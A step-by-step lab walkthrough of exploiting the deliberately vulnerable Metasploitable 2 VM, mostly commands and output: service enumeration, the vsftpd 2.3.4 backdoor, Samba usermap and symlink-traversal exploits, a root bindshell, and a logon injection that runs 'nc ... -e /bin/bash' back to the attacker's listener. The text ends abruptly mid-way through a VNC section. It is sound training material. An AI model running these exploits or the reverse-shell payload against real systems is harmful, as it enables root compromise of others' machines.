Metasploitable 2

Metasploitable 2 is a purposely vulnerable virtual machine that is designed for security testing, training, and educational purposes. Here, we have complete walkthrough of the machine.

Scanning

                                                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -O -p- 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00067s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.204.137
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2024-04-27T09:00:29+00:00; +7s from scanner time.
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      48158/udp   mountd
|   100005  1,2,3      53046/tcp   mountd
|   100021  1,3,4      39352/udp   nlockmgr
|   100021  1,3,4      52660/tcp   nlockmgr
|   100024  1          36532/tcp   status
|_  100024  1          37990/udp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 9
|   Capabilities flags: 43564
|   Some Capabilities: Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsCompression
|   Status: Autocommit
|_  Salt: ddGt6L^rC8/!VoJfBTbp
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2024-04-27T09:00:29+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 2:37:34
|   source ident: nmap
|   source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_  error: Closing Link: pydyrtxam[192.168.204.137] (Quit: pydyrtxam)
6697/tcp  open  irc         UnrealIRCd (Admin email [email protected])
| irc-info: 
|   users: 2
|   servers: 1
|   lusers: 2
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 2:37:34
|   source ident: nmap
|   source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_  error: Closing Link: aglkdhksl[192.168.204.137] (Quit: aglkdhksl)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36532/tcp open  status      1 (RPC #100024)
43137/tcp open  java-rmi    GNU Classpath grmiregistry
52660/tcp open  nlockmgr    1-4 (RPC #100021)
53046/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:71:62:0D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2024-04-27T05:00:17-04:00
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 7s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.23 seconds
// Some code

Enumeration

Netbios Enumeration

We can provide the range to nbstat command on Kali and enumerate complete subnet.

└─$ nbtscan -r 192.168.204.135/24
Doing NBT name scan for addresses from 192.168.204.135/24

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.204.1    DESKTOP-GF76LUG  <server>  <unknown>        00:50:56:c0:00:08
192.168.204.135  <unknown>                  <unknown>        
192.168.204.136  METASPLOITABLE   <server>  METASPLOITABLE   00:00:00:00:00:00
192.168.204.255 Sendto failed: Permission denied

We can see the machine name. Simlarly, we can run an nmap scan with nbstat script.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 --script nbstat.nse
Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>

Windows also have inbuilt tools to enumerate Netbios. Similarly we can check for current cache result of Netbios.

C:\Users\Hp>nbtstat -c

SMB Enumeration

Nmap Provides a number of scripts for SMB Enumeration.

For example we can use script for OS Discovery through smb.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 139,445 -script smb-os-discovery 192.168.204.136

Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 09:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00031s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:71:62:0D (VMware)

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2024-03-21T09:58:59-04:00

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds

Similalry we can list shares with smbclient

┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            METASPLOITABLE

Similarly, we can check if we have read/write access on shares with smbmap.

┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136
[+] IP: 192.168.204.136:445     Name: 192.168.204.136                                   
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian)   

We can see that we have write access on tmp directory which can be useful in exploitation phase.

We can run an automated script enum4linux to extract usernames as well.

SMTP Enumeration

We can also gather information about a host or network from vulnerable mail servers. The Simple Mail Transport Protocol (SMTP) supports several interesting commands, such as VRFY and EXPN A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to verify existing users on a mail server, which is useful information during a penetration test.

We can use the VRFY commands to verify if users on SMTP servers exits.

┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 25            
(UNKNOWN) [192.168.204.136] 25 (smtp) open
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
VRFY msfadmin
252 2.0.0 msfadmin

We can use a meterpreter module to enumerate SMTP users.

msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.204.136:25    - 192.168.204.136:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

[+] 192.168.204.136:25    - 192.168.204.136:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, mysql, news, nobody, postfix, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] 192.168.204.136:25    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can use smtp-user-enum to verify list of users if they exists or not.

──(kali㉿kali)-[~]
└─$ smtp-user-enum -M VRFY -U ~/Downloads/msfusers -t 192.168.204.136 

Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/kali/Downloads/msfusers
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Thu Mar 21 10:29:02 2024 #########
192.168.204.136: root exists
192.168.204.136: games exists
192.168.204.136: bin exists
192.168.204.136: nobody exists
192.168.204.136: sshd exists
192.168.204.136: dhcp exists
192.168.204.136: daemon exists
192.168.204.136: gnats exists
192.168.204.136: msfadmin exists
192.168.204.136: tomcat55 exists
######## Scan completed at Thu Mar 21 10:29:04 2024 #########
10 results.

NFS Enumeration

We can try to list down shares available with showmount.

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.204.136        
Export list for 192.168.204.136:
/ *

We can see that root folder is shared and we can mount it and exploit it.

Port 21 FTP Exploitation Metasploitable2

Scanning

Port 21 is open on Metasploitable2 and is running vsftpd 2.3.4 which has an inbuilt backdoor.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 21 192.168.204.136 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 07:59 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00039s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| vulners: 
|   cpe:/a:vsftpd:vsftpd:2.3.4: 
|       PRION:CVE-2011-2523     10.0    https://vulners.com/prion/PRION:CVE-2011-2523
|       EDB-ID:49757    10.0    https://vulners.com/exploitdb/EDB-ID:49757      *EXPLOIT*
|_      1337DAY-ID-36095        10.0    https://vulners.com/zdt/1337DAY-ID-36095        *EXPLOIT*
MAC Address: 00:0C:29:71:62:0D (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.66 seconds

Manual Exploitation vsftpd 2.3.4

┌──(kali㉿kali)-[~]
└─$ ftp 192.168.204.136
Connected to 192.168.204.136.
220 (vsFTPd 2.3.4)
Name (192.168.204.136:kali): a:)
331 Please specify the password.
Password: 
421 Service not available, remote server has closed connection.
ftp: Login failed
ftp> exit

The trick is to add" :) " at the end of username. It opens a backdoor on port 6200. Which you can now connect.

┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 6200
(UNKNOWN) [192.168.204.136] 6200 (?) open
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Manual Exploitation vsftpd 2.3.4 Method 2

We can use exploits from exploit-db. Search for exploit using searchsploit

┌──(kali㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4                           

--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                          | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                             | unix/remote/17491.rb
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Now copy the exploit

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 49757    

  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
    Codes: CVE-2011-2523
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/49757.py

Now run it against the target. We will get the shell

┌──(kali㉿kali)-[~]
└─$ python2 49757.py 192.168.204.136 
Success, shell opened
Send `exit` to quit shell
ls
bin
boot
cdrom
dev

FTP exploitation - Metasploit

Search for Vsftd in metasploit

msf6 auxiliary(scanner/vnc/vnc_login) > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

Now use it, select the target and run it. We will get the shell.

msf6 auxiliary(scanner/vnc/vnc_login) > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                      ki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.204.136:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.204.136:21 - USER: 331 Please specify the password.
[+] 192.168.204.136:21 - Backdoor service has been spawned, handling...
[+] 192.168.204.136:21 - UID: uid=0(root) gid=0(root)
is[*] Found shell.
d
id
id
[*] Command shell session 1 opened (192.168.204.135:43497 -> 192.168.204.136:6200) at 2024-03-18 10:27:28 -0400

uid=0(root) gid=0(root)
uid=0(root) gid=0(root)
uid=0(root) gid=0(root)

Port 445 SMB Exploitation Metasploitable2

Scanning with vuln and vulners SMB port

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p 139,445 192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00044s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 139,445 192.168.204.136 
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-17 08:58 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:71:62:0D (VMware)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.50 seconds

As we did not get exact version of smb service, we can try metasploit auxillary module to check smb version.

msf6 > search smb version

Matching Modules
================

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   exploit/multi/http/struts_code_exec_classloader           2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   1   exploit/linux/misc/cisco_rv340_sslvpn                     2022-02-02       good       Yes    Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
   2   exploit/windows/smb/ms08_067_netapi                       2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
   3   exploit/windows/browser/ms10_022_ie_vbscript_winhlp32     2010-02-26       great      No     MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
   4   exploit/windows/fileformat/ms14_060_sandworm              2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   5   auxiliary/dos/windows/smb/rras_vls_null_deref             2006-06-14       normal     No     Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
   6   auxiliary/dos/windows/smb/ms11_019_electbowser                             normal     No     Microsoft Windows Browser Pool DoS
   7   exploit/windows/smb/smb_rras_erraticgopher                2017-06-13       average    Yes    Microsoft Windows RRAS Service MIBEntryGet Overflow
   8   auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow                   normal     No     Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
   9   auxiliary/scanner/smb/smb_version                                          normal     No     SMB Version Detection

We can see that we have scanner at number 9.

msf6 > use 9
msf6 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/met
                                       asploit-framework/wiki/Using-Metasploit
   THREADS  1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.204.136:445   - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[*] 192.168.204.136:445   -   Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.204.136:      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Running it we get the samba version (Samba 3.0.20-Debian).

Now let us see what we get at searchsploit.

archsploit Samba 3.0.20                                
------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                 |  Path
------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                         | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploi | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                          | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                  | linux_x86/dos/36741.py
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

So, we have a metasploit module to exploit the vulnerability.

Samba exploitation Metasploitable 2 with Metasploit

msf6 auxiliary(scanner/smb/smb_version) > search samba user map

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution                                                                  


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script 
msf6 auxiliary(scanner/smb/smb_version) > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/meta
                                      sploit-framework/wiki/Using-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.135  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 192.168.204.135:4444 
ls
[*] Command shell session 1 opened (192.168.204.135:4444 -> 192.168.204.136:57884) at 2024-03-17 09:01:33 -0400

bin
boot
cdrom              

Manual SMB (Samba Exploitation) on Metasploitable 2 without metasploit

Use smbclient to connect to shares. We can see that we can connect anonymously.

┌──(kali㉿kali)-[~]
└─$ smbclient -L \\192.168.204.136
Password for [WORKGROUP\kali]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Here we have tmp share. If it writable we can leverage it to get a shell.

Now connect with it and check the available commands with help command.

┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.204.136/tmp 
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..          

Now open a listener on the attacking machine.

nc -lnvp 4444   

Now use the following command

logon "/=`nc 192.168.204.135 4444 -e /bin/bash`"

And we get the shell

Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.204.136                

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 192.168.204.136:445     Name: 192.168.204.136           Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (metasploitable server (Samba 3.0.20-Debian))

Now, we can use a meatasploit module to exploit it.

┌──(kali㉿kali)-[~]
└─$ msfconsole
msf6 > use auxiliary/admin/smb/samba_symlink_traversal
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.204.136

[*] 192.168.204.136:445 - Connecting to the server...
[*] 192.168.204.136:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.204.136:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.204.136:445 - Now access the following share to browse the root filesystem:
[*] 192.168.204.136:445 -       \\192.168.204.136\tmp\rootfs\

[*] Auxiliary module execution completed
msf6 auxiliary(admin/smb/samba_symlink_traversal) > 

Now, we have a share rootfs where we can access the complete file system.

┌──(kali㉿kali)-[~]
└─$ smbclient  \\\\192.168.204.136\\tmp      
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \rootfs\> cd etc
smb: \rootfs\etc\> more passwd

Port 1524 Remote Shell Metasploitable2

We saw an open port 1524 on the machine. We can try to fingerprint it with version scan for the running service.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vuln -p 1524 192.168.204.136
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 23:32 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).

PORT     STATE SERVICE   VERSION
1524/tcp open  bindshell Metasploitable root shell
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.90 seconds

We can see that we have a bind shell on the port. We can try connecting to it.

┌──(kali㉿kali)-[~]
└─$ nc -nv 192.168.204.136 1524
(UNKNOWN) [192.168.204.136] 1524 (ingreslock) open
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# whoami
root
root@metasploitable:/# 

And we are successfully able to connect to our backdoor.

Port 5900 VNC Exploitation Metasploitable2

First scan for the service

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p 5900 --script vuln 192.168.204.136
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-18 10:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00032s latency).

PORT     STATE SERVICE VERSION
5900/tcp open  vnc     VNC (protocol 3.3)
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds

The port is open. However, we have not found any vulnerabilities. We will try to brute force it with metasploit.

Bruteforcing VNC Metasploit

search for VNC auxillary modules

msf6 > search vnc

Matching Modules
================

   #   Name                                                                Disclosure Date  Rank       Check  Description
   -   ----                                                                ---------------  ----       -----  -----------
   0   auxiliary/scanner/vnc/ard_root_pw                                                    normal     No     Apple Remote Desktop Root Vulnerability
   1   auxiliary/server/capture/vnc                                                         normal     No     Authentication Capture: VNC
